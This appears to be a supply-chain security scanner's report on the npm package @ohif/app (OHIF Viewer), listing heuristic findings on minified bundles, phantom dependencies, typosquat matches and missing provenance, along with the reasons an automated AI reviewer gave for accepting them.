@ohif/app
OHIF Viewer
Supply chain provenance
Status for the latest visible version.
Without SLSA provenance there is no cryptographic link between this tarball and the public source — the axios compromise (March 2026) relied on exactly this gap.
Maintainers
Accepted risks
Findings the reviewer chose to accept rather than block on.
| Source | Rule | Reason | Accepted by | When |
|---|---|---|---|---|
| phantom-deps | phantom-dep:@ohif/extension-default | AI (phantom-deps): Same-org OHIF extension; loaded by app configuration convention. | ai | |
| source-diff | obfuscated-file:dist/5858.bundle.466e58128de344ab53f3.js | AI (source-diff): CharLS WASM codec bundle; minified Emscripten output is expected for WASM modules. | ai | |
| source-diff | obfuscated-file:dist/6376.bundle.527820a5cb1eece2a8d2.js | AI (source-diff): Standard webpack bundle; minification is expected for OHIF dist bundles. | ai | |
| source-diff | obfuscated-file:dist/7431.bundle.b31ebb4a2625e89d864e.js | AI (source-diff): Standard webpack bundle; minification is expected for OHIF dist bundles. | ai | |
| source-diff | obfuscated-file:dist/8665.bundle.dc56c125411422f9f686.js | AI (source-diff): Standard webpack bundle; minification is expected for OHIF dist bundles. | ai | |
| source-diff | net-exec-file:dist/2108.bundle.aea8d3b39486dd5ab39e.js | AI (source-diff): DICOM SUV scaling factors bundle; network+exec pattern is webpack module loading, not malware. | ai | |
| source-diff | net-exec-file:dist/5858.bundle.466e58128de344ab53f3.js | AI (source-diff): CharLS WASM codec; Emscripten runtime legitimately uses fetch/XHR for WASM binary loading. | ai | |
| source-diff | net-exec-file:dist/6347.bundle.f8393c20d5159ed41b64.js | AI (source-diff): Cornerstone adapters bundle; network+exec is webpack module loading pattern. | ai | |
| source-diff | net-exec-file:dist/6354.bundle.d8a592b03e9a5b7a66c2.js | AI (source-diff): Standard OHIF webpack bundle; network+exec is webpack module loading pattern. | ai | |
| source-diff | net-exec-file:dist/7431.bundle.b31ebb4a2625e89d864e.js | AI (source-diff): Standard OHIF webpack bundle; network+exec is webpack module loading pattern. | ai | |
| source-diff | net-exec-file:dist/8665.bundle.dc56c125411422f9f686.js | AI (source-diff): Standard OHIF webpack bundle; network+exec is webpack module loading pattern. | ai | |
| phantom-deps | phantom-dep:core-js | AI (phantom-deps): Known implicit polyfill dependency for OHIF; loaded by convention. | ai | |
| phantom-deps | phantom-dep:react-dom | AI (phantom-deps): Peer dependency loaded by convention in OHIF ecosystem. | ai | |
| phantom-deps | phantom-dep:@ohif/extension-cornerstone | AI (phantom-deps): Same-org OHIF extension; loaded by app configuration convention. | ai | |
| source-diff | obfuscated-file:dist/2516.bundle.f62228e9a800de8d4b31.js | AI (source-diff): Standard webpack bundle for itk-wasm morphological contour interpolation; minification is expected. | ai | |
| source-diff | obfuscated-file:dist/3081.bundle.930757b1a5aa8549e112.js | AI (source-diff): Standard webpack bundle for OHIF cornerstone hooks; minification is expected. | ai | |
| source-diff | obfuscated-file:dist/5462.bundle.d5bb9b3ddc510fea141f.js | AI (source-diff): Standard webpack bundle for cornerstone tools; minification is expected. | ai | |
| source-diff | obfuscated-file:dist/5830.bundle.791019deddd536980a11.js | AI (source-diff): Standard webpack bundle for itk-wasm; minification is expected. | ai | |
| typosquat | typosquat.levenshtein:pg | AI (typosquat): Scoped package @ohif/app; Levenshtein match to 'pg' is a false positive. | ai | |
| typosquat | typosquat.levenshtein:yup | AI (typosquat): Scoped package @ohif/app; Levenshtein match to 'yup' is a false positive. | ai | |
| typosquat | typosquat.levenshtein:ajv | AI (typosquat): Scoped package @ohif/app; Levenshtein match to 'ajv' is a false positive. | ai | |
| phantom-deps | phantom-dep:react | AI (phantom-deps): Webpack app; react is referenced in config/build files, not directly imported in source. | ai | |
| phantom-deps | phantom-dep:dcmjs | AI (phantom-deps): Config-referenced dep in a webpack-based DICOM viewer; stable false positive. | ai | |
| phantom-deps | phantom-dep:@ohif/core | AI (phantom-deps): Same-org scoped dep; phantom-dep heuristic unreliable for monorepo packages. | ai | |
| phantom-deps | phantom-dep:@ohif/ui | AI (phantom-deps): Same-org scoped dep; phantom-dep heuristic unreliable for monorepo packages. | ai | |
| phantom-deps | phantom-dep:@ohif/i18n | AI (phantom-deps): Same-org scoped dep; phantom-dep heuristic unreliable for monorepo packages. | ai | |
| phantom-deps | phantom-dep:@ohif/ui-next | AI (phantom-deps): Same-org scoped dep; phantom-dep heuristic unreliable for monorepo packages. | ai | |
| phantom-deps | phantom-dep:oidc-client | AI (phantom-deps): Config-referenced dep; stable false positive for this webpack app. | ai | |
| phantom-deps | phantom-dep:dicom-parser | AI (phantom-deps): Config-referenced dep; stable false positive for this DICOM viewer. | ai | |
| provenance | no-provenance | AI (provenance): Established package with 811 versions; lack of provenance is common and not a risk signal here. | ai | |
| typosquat | typosquat.levenshtein:hapi | AI (typosquat): Scoped package @ohif/app; Levenshtein match to 'hapi' is a false positive. | ai |
v3.12.2
3 findingsNewly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v3.12.1
15 findingsNewly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
[Accepted risk] Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.